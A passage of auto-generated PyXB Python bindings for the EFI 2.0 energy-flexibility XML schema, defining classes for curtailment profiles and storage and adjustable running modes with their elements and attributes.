"""Complex type {http://www.flexiblepower.org/efi-2}CurtailmentProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 329, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}curtailmentProfileElement uses Python identifier curtailmentProfileElement
__curtailmentProfileElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfileElement'), 'curtailmentProfileElement', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfile_httpwww_flexiblepower_orgefi_2curtailmentProfileElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 331, 3), )
curtailmentProfileElement = property(__curtailmentProfileElement.value, __curtailmentProfileElement.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}curtailmentQuantity uses Python identifier curtailmentQuantity
__curtailmentQuantity = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'curtailmentQuantity'), 'curtailmentQuantity', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfile_httpwww_flexiblepower_orgefi_2curtailmentQuantity', _module_typeBindings.CurtailmentQuantity, required=True)
__curtailmentQuantity._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 333, 2)
__curtailmentQuantity._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 333, 2)
curtailmentQuantity = property(__curtailmentQuantity.value, __curtailmentQuantity.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}startTime uses Python identifier startTime
__startTime = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'startTime'), 'startTime', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfile_httpwww_flexiblepower_orgefi_2startTime', pyxb.binding.datatypes.dateTime, required=True)
__startTime._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 334, 2)
__startTime._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 334, 2)
startTime = property(__startTime.value, __startTime.set, None, None)
_ElementMap.update({
__curtailmentProfileElement.name() : __curtailmentProfileElement
})
_AttributeMap.update({
__curtailmentQuantity.name() : __curtailmentQuantity,
__startTime.name() : __startTime
})
_module_typeBindings.CurtailmentProfile = CurtailmentProfile
Namespace.addCategoryObject('typeBinding', 'CurtailmentProfile', CurtailmentProfile)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileAlternative with content type ELEMENT_ONLY
class SequentialProfileAlternative (ProfileContainer):
"""Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileAlternative with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfileAlternative')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 358, 1)
_ElementMap = ProfileContainer._ElementMap.copy()
_AttributeMap = ProfileContainer._AttributeMap.copy()
# Base type is ProfileContainer
# Element electricityProfile ({http://www.flexiblepower.org/efi-2}electricityProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
# Element electricityProbabilityProfile ({http://www.flexiblepower.org/efi-2}electricityProbabilityProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
# Element gasProfile ({http://www.flexiblepower.org/efi-2}gasProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
# Element gasProbabilityProfile ({http://www.flexiblepower.org/efi-2}gasProbabilityProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
# Element heatProfile ({http://www.flexiblepower.org/efi-2}heatProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
# Element heatProbabilityProfile ({http://www.flexiblepower.org/efi-2}heatProbabilityProfile) inherited from {http://www.flexiblepower.org/efi-2}ProfileContainer
# Attribute {http://www.flexiblepower.org/efi-2}alternativeNr uses Python identifier alternativeNr
__alternativeNr = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'alternativeNr'), 'alternativeNr', '__httpwww_flexiblepower_orgefi_2_SequentialProfileAlternative_httpwww_flexiblepower_orgefi_2alternativeNr', pyxb.binding.datatypes.int, required=True)
__alternativeNr._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 361, 4)
__alternativeNr._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 361, 4)
alternativeNr = property(__alternativeNr.value, __alternativeNr.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__alternativeNr.name() : __alternativeNr
})
_module_typeBindings.SequentialProfileAlternative = SequentialProfileAlternative
Namespace.addCategoryObject('typeBinding', 'SequentialProfileAlternative', SequentialProfileAlternative)
# Complex type {http://www.flexiblepower.org/efi-2}StorageDiscreteRunningMode with content type ELEMENT_ONLY
class StorageDiscreteRunningMode (RunningMode):
"""Complex type {http://www.flexiblepower.org/efi-2}StorageDiscreteRunningMode with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageDiscreteRunningMode')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 581, 1)
_ElementMap = RunningMode._ElementMap.copy()
_AttributeMap = RunningMode._AttributeMap.copy()
# Base type is RunningMode
# Element {http://www.flexiblepower.org/efi-2}discreteRunningModeElement uses Python identifier discreteRunningModeElement
__discreteRunningModeElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningModeElement'), 'discreteRunningModeElement', '__httpwww_flexiblepower_orgefi_2_StorageDiscreteRunningMode_httpwww_flexiblepower_orgefi_2discreteRunningModeElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 585, 5), )
discreteRunningModeElement = property(__discreteRunningModeElement.value, __discreteRunningModeElement.set, None, None)
# Attribute id inherited from {http://www.flexiblepower.org/efi-2}RunningMode
# Attribute label inherited from {http://www.flexiblepower.org/efi-2}RunningMode
_ElementMap.update({
__discreteRunningModeElement.name() : __discreteRunningModeElement
})
_AttributeMap.update({
})
_module_typeBindings.StorageDiscreteRunningMode = StorageDiscreteRunningMode
Namespace.addCategoryObject('typeBinding', 'StorageDiscreteRunningMode', StorageDiscreteRunningMode)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_16 (StorageRunningModeElement):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 586, 6)
_ElementMap = StorageRunningModeElement._ElementMap.copy()
_AttributeMap = StorageRunningModeElement._AttributeMap.copy()
# Base type is StorageRunningModeElement
# Element {http://www.flexiblepower.org/efi-2}fillingRate uses Python identifier fillingRate
__fillingRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'fillingRate'), 'fillingRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2fillingRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 590, 10), )
fillingRate = property(__fillingRate.value, __fillingRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}runningCost uses Python identifier runningCost
__runningCost = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), 'runningCost', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2runningCost', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 591, 10), )
runningCost = property(__runningCost.value, __runningCost.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}electricalPower uses Python identifier electricalPower
__electricalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), 'electricalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2electricalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 592, 10), )
electricalPower = property(__electricalPower.value, __electricalPower.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}gasFlowRate uses Python identifier gasFlowRate
__gasFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), 'gasFlowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2gasFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 593, 10), )
gasFlowRate = property(__gasFlowRate.value, __gasFlowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatTemperature uses Python identifier heatTemperature
__heatTemperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), 'heatTemperature', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2heatTemperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 594, 10), )
heatTemperature = property(__heatTemperature.value, __heatTemperature.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatFlowRate uses Python identifier heatFlowRate
__heatFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), 'heatFlowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2heatFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 595, 10), )
heatFlowRate = property(__heatFlowRate.value, __heatFlowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatThermalPower uses Python identifier heatThermalPower
__heatThermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), 'heatThermalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2heatThermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 596, 10), )
heatThermalPower = property(__heatThermalPower.value, __heatThermalPower.set, None, None)
# Attribute fillLevelLowerBound inherited from {http://www.flexiblepower.org/efi-2}StorageRunningModeElement
# Attribute fillLevelUpperBound inherited from {http://www.flexiblepower.org/efi-2}StorageRunningModeElement
_ElementMap.update({
__fillingRate.name() : __fillingRate,
__runningCost.name() : __runningCost,
__electricalPower.name() : __electricalPower,
__gasFlowRate.name() : __gasFlowRate,
__heatTemperature.name() : __heatTemperature,
__heatFlowRate.name() : __heatFlowRate,
__heatThermalPower.name() : __heatThermalPower
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_16 = CTD_ANON_16
# Complex type {http://www.flexiblepower.org/efi-2}StorageContinuousRunningMode with content type ELEMENT_ONLY
class StorageContinuousRunningMode (RunningMode):
"""Complex type {http://www.flexiblepower.org/efi-2}StorageContinuousRunningMode with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageContinuousRunningMode')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 617, 1)
_ElementMap = RunningMode._ElementMap.copy()
_AttributeMap = RunningMode._AttributeMap.copy()
# Base type is RunningMode
# Element {http://www.flexiblepower.org/efi-2}continuousRunningModeElement uses Python identifier continuousRunningModeElement
__continuousRunningModeElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningModeElement'), 'continuousRunningModeElement', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningMode_httpwww_flexiblepower_orgefi_2continuousRunningModeElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 621, 5), )
continuousRunningModeElement = property(__continuousRunningModeElement.value, __continuousRunningModeElement.set, None, None)
# Attribute id inherited from {http://www.flexiblepower.org/efi-2}RunningMode
# Attribute label inherited from {http://www.flexiblepower.org/efi-2}RunningMode
_ElementMap.update({
__continuousRunningModeElement.name() : __continuousRunningModeElement
})
_AttributeMap.update({
})
_module_typeBindings.StorageContinuousRunningMode = StorageContinuousRunningMode
Namespace.addCategoryObject('typeBinding', 'StorageContinuousRunningMode', StorageContinuousRunningMode)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_17 (StorageRunningModeElement):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 622, 6)
_ElementMap = StorageRunningModeElement._ElementMap.copy()
_AttributeMap = StorageRunningModeElement._AttributeMap.copy()
# Base type is StorageRunningModeElement
# Element {http://www.flexiblepower.org/efi-2}lowerBound uses Python identifier lowerBound
__lowerBound = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), 'lowerBound', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_17_httpwww_flexiblepower_orgefi_2lowerBound', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 626, 10), )
lowerBound = property(__lowerBound.value, __lowerBound.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}upperBound uses Python identifier upperBound
__upperBound = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), 'upperBound', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_17_httpwww_flexiblepower_orgefi_2upperBound', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 633, 10), )
upperBound = property(__upperBound.value, __upperBound.set, None, None)
# Attribute fillLevelLowerBound inherited from {http://www.flexiblepower.org/efi-2}StorageRunningModeElement
# Attribute fillLevelUpperBound inherited from {http://www.flexiblepower.org/efi-2}StorageRunningModeElement
_ElementMap.update({
__lowerBound.name() : __lowerBound,
__upperBound.name() : __upperBound
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_17 = CTD_ANON_17
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_18 (StorageContinuousRunningModeData):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 627, 11)
_ElementMap = StorageContinuousRunningModeData._ElementMap.copy()
_AttributeMap = StorageContinuousRunningModeData._AttributeMap.copy()
# Base type is StorageContinuousRunningModeData
# Element fillingRate ({http://www.flexiblepower.org/efi-2}fillingRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element runningCost ({http://www.flexiblepower.org/efi-2}runningCost) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element electricalPower ({http://www.flexiblepower.org/efi-2}electricalPower) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element gasFlowRate ({http://www.flexiblepower.org/efi-2}gasFlowRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element heatTemperature ({http://www.flexiblepower.org/efi-2}heatTemperature) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element heatFlowRate ({http://www.flexiblepower.org/efi-2}heatFlowRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element heatThermalPower ({http://www.flexiblepower.org/efi-2}heatThermalPower) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_18 = CTD_ANON_18
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_19 (StorageContinuousRunningModeData):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 634, 11)
_ElementMap = StorageContinuousRunningModeData._ElementMap.copy()
_AttributeMap = StorageContinuousRunningModeData._AttributeMap.copy()
# Base type is StorageContinuousRunningModeData
# Element fillingRate ({http://www.flexiblepower.org/efi-2}fillingRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element runningCost ({http://www.flexiblepower.org/efi-2}runningCost) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element electricalPower ({http://www.flexiblepower.org/efi-2}electricalPower) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element gasFlowRate ({http://www.flexiblepower.org/efi-2}gasFlowRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element heatTemperature ({http://www.flexiblepower.org/efi-2}heatTemperature) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element heatFlowRate ({http://www.flexiblepower.org/efi-2}heatFlowRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
# Element heatThermalPower ({http://www.flexiblepower.org/efi-2}heatThermalPower) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_19 = CTD_ANON_19
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableDiscreteRunningMode with content type ELEMENT_ONLY
class AdjustableDiscreteRunningMode (RunningMode):
"""Complex type {http://www.flexiblepower.org/efi-2}AdjustableDiscreteRunningMode with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableDiscreteRunningMode')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 824, 1)
_ElementMap = RunningMode._ElementMap.copy()
_AttributeMap = RunningMode._AttributeMap.copy()
# Base type is RunningMode
# Element {http://www.flexiblepower.org/efi-2}runningCost uses Python identifier runningCost
__runningCost = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), 'runningCost', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2runningCost', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 828, 5), )
runningCost = property(__runningCost.value, __runningCost.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}electricalPower uses Python identifier electricalPower
__electricalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), 'electricalPower', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2electricalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 829, 5), )
electricalPower = property(__electricalPower.value, __electricalPower.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}gasFlowRate uses Python identifier gasFlowRate
__gasFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), 'gasFlowRate', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2gasFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 830, 5), )
gasFlowRate = property(__gasFlowRate.value, __gasFlowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatTemperature uses Python identifier heatTemperature
__heatTemperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), 'heatTemperature', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2heatTemperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 831, 5), )
heatTemperature = property(__heatTemperature.value, __heatTemperature.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatFlowRate uses Python identifier heatFlowRate
__heatFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), 'heatFlowRate', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2heatFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 832, 5), )
heatFlowRate = property(__heatFlowRate.value, __heatFlowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatThermalPower uses Python identifier heatThermalPower
__heatThermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), 'heatThermalPower', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2heatThermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 833, 5), )
heatThermalPower = property(__heatThermalPower.value, __heatThermalPower.set, None, None)
# Attribute id inherited from {http://www.flexiblepower.org/efi-2}RunningMode
# Attribute label inherited from {http://www.flexiblepower.org/efi-2}RunningMode
_ElementMap.update({
__runningCost.name() : __runningCost,
__electricalPower.name() : __electricalPower,
__gasFlowRate.name() : __gasFlowRate,
__heatTemperature.name() : __heatTemperature,
__heatFlowRate.name() : __heatFlowRate,
__heatThermalPower.name() : __heatThermalPower
})
_AttributeMap.update({
})
_module_typeBindings.AdjustableDiscreteRunningMode = AdjustableDiscreteRunningMode
Namespace.addCategoryObject('typeBinding', 'AdjustableDiscreteRunningMode', AdjustableDiscreteRunningMode)
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningMode with content type ELEMENT_ONLY
class AdjustableContinuousRunningMode (RunningMode):
"""Complex type {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningMode with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableContinuousRunningMode')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 848, 1)
_ElementMap = RunningMode._ElementMap.copy()
_AttributeMap = RunningMode._AttributeMap.copy()
# Base type is RunningMode
# Element {http://www.flexiblepower.org/efi-2}lowerBound uses Python identifier lowerBound
__lowerBound = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), 'lowerBound', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningMode_httpwww_flexiblepower_orgefi_2lowerBound', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 852, 5), )
lowerBound = property(__lowerBound.value, __lowerBound.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}upperBound uses Python identifier upperBound
__upperBound = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), 'upperBound', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningMode_httpwww_flexiblepower_orgefi_2upperBound', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 859, 5), )
upperBound = property(__upperBound.value, __upperBound.set, None, None)
# Attribute id inherited from {http://www.flexiblepower.org/efi-2}RunningMode
# Attribute label inherited from {http://www.flexiblepower.org/efi-2}RunningMode
_ElementMap.update({
__lowerBound.name() : __lowerBound,
__upperBound.name() : __upperBound
})
_AttributeMap.update({
})
_module_typeBindings.AdjustableContinuousRunningMode = AdjustableContinuousRunningMode
Namespace.addCategoryObject('typeBinding', 'AdjustableContinuousRunningMode', AdjustableContinuousRunningMode)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_20 (AdjustableContinuousRunningModeData):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 853, 6)
_ElementMap = AdjustableContinuousRunningModeData._ElementMap.copy()
_AttributeMap = AdjustableContinuousRunningModeData._AttributeMap.copy()
# Base type is AdjustableContinuousRunningModeData
# Element runningCost ({http://www.flexiblepower.org/efi-2}runningCost) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element electricalPower ({http://www.flexiblepower.org/efi-2}electricalPower) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element gasFlowRate ({http://www.flexiblepower.org/efi-2}gasFlowRate) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element heatTemperature ({http://www.flexiblepower.org/efi-2}heatTemperature) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element heatFlowRate ({http://www.flexiblepower.org/efi-2}heatFlowRate) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element heatThermalPower ({http://www.flexiblepower.org/efi-2}heatThermalPower) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_20 = CTD_ANON_20
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_21 (AdjustableContinuousRunningModeData):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 860, 6)
_ElementMap = AdjustableContinuousRunningModeData._ElementMap.copy()
_AttributeMap = AdjustableContinuousRunningModeData._AttributeMap.copy()
# Base type is AdjustableContinuousRunningModeData
# Element runningCost ({http://www.flexiblepower.org/efi-2}runningCost) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element electricalPower ({http://www.flexiblepower.org/efi-2}electricalPower) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element gasFlowRate ({http://www.flexiblepower.org/efi-2}gasFlowRate) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element heatTemperature ({http://www.flexiblepower.org/efi-2}heatTemperature) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element heatFlowRate ({http://www.flexiblepower.org/efi-2}heatFlowRate) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
# Element heatThermalPower ({http://www.flexiblepower.org/efi-2}heatThermalPower) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_21 = CTD_ANON_21
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_22 (FlexibilityRegistration):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 216, 2)
_ElementMap = FlexibilityRegistration._ElementMap.copy()
_AttributeMap = FlexibilityRegistration._AttributeMap.copy()
# Base type is FlexibilityRegistration
# Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
# Element instructionProcessingDelay ({http://www.flexiblepower.org/efi-2}instructionProcessingDelay) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
# Element deviceDescription ({http://www.flexiblepower.org/efi-2}deviceDescription) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
